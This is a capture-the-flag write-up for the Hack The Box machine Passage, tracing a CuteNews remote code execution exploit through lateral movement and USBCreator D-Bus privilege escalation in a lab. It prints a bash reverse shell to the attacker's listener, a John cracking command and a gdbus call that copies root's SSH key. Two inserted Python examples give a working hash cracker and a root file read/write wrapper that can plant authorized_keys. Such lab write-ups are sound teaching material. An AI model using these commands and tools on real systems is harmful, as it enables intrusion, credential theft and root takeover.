Hack The Box — Passage
Introduction
Hello there! Thank you for taking the time to read my write-up for Passage, from Hack The Box. Passage is a Medium-rated Linux machine running a vulnerable version of CuteNews, a PHP news management system. Once on the box, some careful enumeration turns up SSH keys that enable lateral movement. The machine finishes with a root shell obtained through the USBCreator D-Bus privilege escalation.
What will be covered
• Nmap
• Remote Code Execution
• JohnTheRipper
• USBCreator D-Bus Privilege Escalation
With that out of the way, let’s jump right in!
Scanning
The first step I take when working on a Hack The Box machine is to run an Nmap scan. This particular scan was run against all 65,535 TCP ports to check every exposed service, not just the default top 1,000. Nmap reveals only two open ports: 22 (SSH) and 80 (HTTP). The scan hints that the system is running Linux and that the HTTP title is "Passage News". These results can be replicated by running the following command:
sudo nmap -sC -sV -T4 -v -p- -oN nmap/passage.nmap 10.129.209.25
Since there is a web server, that is where I will start.
Web Application
Browsing to http://10.129.209.25 displays a simple news blog. One of the first things I notice is a post stating that the site runs Fail2Ban as a protection mechanism against large volumes of traffic. Normally, I would run a directory brute-forcing tool against a site to expand the attack surface. Since directory brute-forcing generates a large number of requests in a short time and would almost certainly get my address banned, the post makes it clear that this is not a good idea here.
I continued my inspection of the page and noticed something very small at the bottom: “Powered by CuteNews.”
I was unfamiliar with CuteNews, so a quick Google search of “CuteNews Exploit” revealed an Exploit-DB entry for a Remote Code Execution vulnerability with Proof of Concept code available.
I quickly reviewed the source code of the PoC and determined that it was safe to run against the system.
Foothold
I was not 100% sure that this would even work at first. Although it is not a good practice, I tested the vulnerability without first verifying that a vulnerable version was running on the system. Luckily, it worked!
The PoC extracts password hashes, registers a user, and drops into a "shell" where commands can be executed on the system. I saved the dumped hashes to a file and kept moving. A quick whoami confirms I have RCE!
Now that I know I can execute commands remotely on the system, it is time to get a proper shell. I re-ran the PoC and executed the following command to get a reverse shell back to my listener on port 4445:
bash -c 'bash -i >& /dev/tcp/10.10.14.29/4445 0>&1'
I was thrilled to see a connection made to my listener! I quickly upgraded the reverse shell to something more usable and was ready to dive deeper into the box.
At this point, I remembered that I never cracked the hashes I received earlier.
JohnTheRipper
The PoC that I used against this machine extracted SHA-256 hashes in the process of obtaining RCE. As shown in the screenshot below, the hashes can be cracked using either JohnTheRipper or Hashcat. I chose to go with John in this situation.
John paired with rockyou.txt and the raw-sha256 format turned up a single password within seconds. The command used to crack the hashes is as follows, with hashes.txt being the file I saved the dumped hashes to:
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
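To make the cracking step concrete, here is a small offline dictionary attack written for this write-up; it is an added example, not code from the original post, the CuteNews project or the Exploit-DB PoC. The john format used above (raw-sha256) means the hashes are bare, unsalted SHA-256 digests, so each wordlist candidate is hashed exactly once and looked up against every target at the same time, which is why rockyou.txt finishes in seconds. The wordlist, usernames, banner line and hashes below are constructed for the demo; the real dump, rockyou.txt and the actual password are not reproduced.

```python
"""Offline dictionary attack on unsalted SHA-256 hashes (added example)."""
import hashlib
import re
from typing import Dict, Iterable, List, Optional

HEX_SHA256 = re.compile(r"^[0-9a-fA-F]{64}$")

# Constructed mini-wordlist standing in for rockyou.txt (assumption).
WORDLIST: List[str] = ["123456", "password", "letmein", "summer2020", "qwerty"]


def sha256_hex(candidate: str) -> str:
    """Unsalted SHA-256 of the raw password, stored as a hex digest."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()


def parse_hashes(dump: str) -> Dict[str, str]:
    """Extract 'user:hash' or bare hash lines from a PoC-style dump.

    Lines that do not end in a 64-hex-digit SHA-256 (banners, blanks) are
    ignored. Bare hashes get a synthetic label so the result is still a
    user -> hash mapping.
    """
    targets: Dict[str, str] = {}
    for n, line in enumerate(dump.splitlines()):
        line = line.strip()
        if not line:
            continue
        user, _, h = line.rpartition(":")
        if not HEX_SHA256.match(h):
            continue
        targets[user or f"hash{n}"] = h.lower()
    return targets


def crack(targets: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Single pass over the wordlist: one hash per candidate, all targets checked.

    With no salt, every target is a dict lookup against the same digest, so
    the cost is one SHA-256 per candidate regardless of how many users there are.
    Users whose hash is not hit stay None.
    """
    by_hash: Dict[str, List[str]] = {}
    for user, h in targets.items():
        by_hash.setdefault(h, []).append(user)
    found: Dict[str, Optional[str]] = {u: None for u in targets}
    remaining = set(by_hash)
    for candidate in wordlist:
        if not remaining:
            break  # everything cracked, no need to finish the wordlist
        h = sha256_hex(candidate)
        if h in remaining:
            for user in by_hash[h]:
                found[user] = candidate
            remaining.discard(h)
    return found


# Constructed dump: a banner line, two users (one password in the wordlist,
# one not) and a bare hash with no username attached.
SAMPLE_DUMP = "\n".join([
    "[*] Dumping users...",
    "alice:" + sha256_hex("summer2020"),
    "bob:" + sha256_hex("correct horse battery staple"),
    sha256_hex("letmein"),
])

if __name__ == "__main__":
    for user, pw in crack(parse_hashes(SAMPLE_DUMP), WORDLIST).items():
        print(f"{user}: {pw if pw else '<not cracked>'}")
```

The only reason this works is the missing salt: with a per-user salt the single-hash-per-candidate shortcut disappears and the attacker pays one hash per candidate per user, which is the property a password store should have.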
Now that I have a password, it's time to try it against every account on the machine to see where it is reused.
Lateral Movement
One of the first things I normally check after getting a shell on a box is the /home directory. Generally speaking, this is where the user.txt flag will be located. There are two users with home directories: Nadav and Paul. I first try the password by attempting to switch to the Nadav user, without success. Next, I try Paul and get logged in!
user.txt
Changing into Paul’s home directory reveals the user.txt file. At this point I have the ability to collect the flag and complete part one of the challenge.
Since there is another user that is on the box, I know that I need to gain access as that user in order to keep moving forward.
Lateral Movement
Some light enumeration in Paul's home directory turns up something very interesting: the .ssh directory contains SSH keys that were generated for Nadav!
I quickly try to SSH as Nadav using the key locally and sure enough, I get logged in!
Now that I have obtained the second user, it is time to try and escalate to root.
Privilege Escalation
One of the first steps I take when attempting privilege escalation on a Linux machine is to drop linpeas.sh into the /tmp directory to automate the enumeration process. After fetching the script with wget from a web server on my attacking machine, I run it.
One of the things that I like the most about LinPEAS is that it outputs all of the enumeration results in an easy to understand format. After reviewing the output initially, nothing truly stood out as a privilege escalation vector. I got to the SUID portion and started Googling.
I didn't get very far down the list when I discovered a potential privilege escalation path. It appears that the system exposes a vulnerable version of the USBCreator D-Bus interface (com.ubuntu.USBCreator). Its Image method copies a source path to a destination path as root on behalf of any caller that polkit authorizes, which turns it into an arbitrary file read as root. I have linked the reference below for more information on the technique used.
It took a lot of experimentation to finally accomplish my end goal, which was to extract root's SSH private key. The call passes the key as the source, a world-readable location as the destination, and true for the trailing boolean (allow_unsafe) argument:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id true
As shown in the screenshot below, I was able to read root's SSH private key.
At this point, I am able to SSH as the root user locally on the system using the copied key!
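The gdbus call above is one instance of a more general primitive: the Image method hands the two paths to dd running as root, so it copies any file to any destination. The following Python wrapper is an added example written for this write-up, not code from the original post or from the usb-creator project. It builds the same call for an arbitrary source and target and exposes it both as a read primitive (copy a root-only file out to a readable path) and as a write primitive (copy an attacker-controlled file in over a root-owned path). The `run` parameter is an assumption introduced for the demo so the flow can be exercised without a system bus; by default it executes the real gdbus binary, so only run it on a box where you are authorized to do so. The paths used in `demo()` are assumptions as well.

```python
"""Arbitrary file read/write through com.ubuntu.USBCreator.Image (added example)."""
import subprocess
from typing import Callable, List, Sequence

Runner = Callable[[Sequence[str]], int]

BUS_NAME = "com.ubuntu.USBCreator"
OBJECT_PATH = "/com/ubuntu/USBCreator"
METHOD = "com.ubuntu.USBCreator.Image"


def image_argv(source: str, target: str, allow_unsafe: bool = True) -> List[str]:
    """Build the same gdbus invocation as in the write-up, parameterised on paths.

    The third method argument is the boolean allow_unsafe flag; the write-up
    passes true.
    """
    return [
        "gdbus", "call", "--system",
        "--dest", BUS_NAME,
        "--object-path", OBJECT_PATH,
        "--method", METHOD,
        source, target, "true" if allow_unsafe else "false",
    ]


def _real_run(argv: Sequence[str]) -> int:
    """Default runner: actually issue the D-Bus call via gdbus."""
    return subprocess.run(list(argv), check=False).returncode


def copy_as_root(source: str, target: str, run: Runner = _real_run) -> bool:
    """Ask the USBCreator backend to copy source to target; True on success."""
    return run(image_argv(source, target)) == 0


def read_root_file(path: str, scratch: str, run: Runner = _real_run) -> bool:
    """Read primitive: copy a root-only file (e.g. /root/.ssh/id_rsa) somewhere readable."""
    return copy_as_root(path, scratch, run)


def plant_root_file(local_file: str, target: str, run: Runner = _real_run) -> bool:
    """Write primitive: copy a file we control over a root-owned path.

    The same dd-as-root copy works in the other direction, e.g. dropping our
    own public key into /root/.ssh/authorized_keys instead of reading the key out.
    """
    return copy_as_root(local_file, target, run)


def demo() -> List[List[str]]:
    """Dry run with a recording runner; returns the gdbus invocations that would be issued.

    Nothing touches the system bus here, so this is safe to run anywhere.
    """
    issued: List[List[str]] = []

    def record(argv: Sequence[str]) -> int:
        issued.append(list(argv))
        return 0  # pretend the backend accepted the call

    # Exactly the call from the write-up (read root's key out to /tmp/id)...
    read_root_file("/root/.ssh/id_rsa", "/tmp/id", run=record)
    # ...and the write-side counterpart (paths are assumptions for the demo).
    plant_root_file("/tmp/authorized_keys", "/root/.ssh/authorized_keys", run=record)
    return issued


if __name__ == "__main__":
    for argv in demo():
        print(" ".join(argv))
```

Whether the call is honoured at all is decided by polkit, not by this wrapper: the backend only performs the copy for callers the policy authorizes, so the first thing to check on a target is whether your user is in that group.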
root.txt
To finish things up, I grab the root.txt flag and complete the challenge!
Conclusion
Overall this was a very fun and interesting box to complete. If you have made it this far, thank you for taking the time to read this write up! As always, stay tuned for more!